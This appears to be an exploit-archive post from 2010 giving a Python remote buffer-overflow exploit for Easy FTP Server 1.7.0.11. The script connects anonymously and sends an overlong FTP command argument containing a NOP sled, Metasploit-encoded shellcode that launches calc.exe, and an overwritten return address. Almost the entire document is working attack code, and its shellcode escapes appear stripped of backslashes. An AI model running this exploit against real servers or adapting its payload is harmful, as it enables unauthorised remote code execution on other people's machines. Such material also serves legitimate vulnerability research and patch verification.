easyftpnlst-overflow.txt
Posted on 12 August 2010
# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands Remote Buffer Overflow Exploit # Date: 10/8/2010 # Author: Rabih Mohsen # Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip # Version: 1.7.0.11 # Tested on: Windows XP SP3 # CVE: import socket import sys buffersize = 272 # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ] shellcode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1" "x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5" "xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69" "xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e" "x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8" "x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08" "xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c" "x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c" "xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80" "x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b" "xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84" "xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14" "x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c" "xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e" "xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8" "x51x6bx28") eip = "x91xC8x41x7E" # CALL EDI - user32.dll nopsled = "x90" * 16 payload = "x90" * (buffersize-(len(nopsled)+len(shellcode))) # target, CMDS: anny of the "NLST , NLST -al, APPE, RETR , SIZE and XCWD" def GenericEasyFTPExploit(target, CMDS): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((target, 21)) s.recv(1024) s.send('User anonymous ') s.recv(1024) s.send('PASS anonymous ') s.send(CMDS +" " + nopsled+shellcode+payload+eip+' ') s.recv(1024) s.send('QUIT EASY ftp ') s.close() target = sys.argv[1] CMDS = sys.argv[2] GenericEasyFTPExploit(target,CMDS)
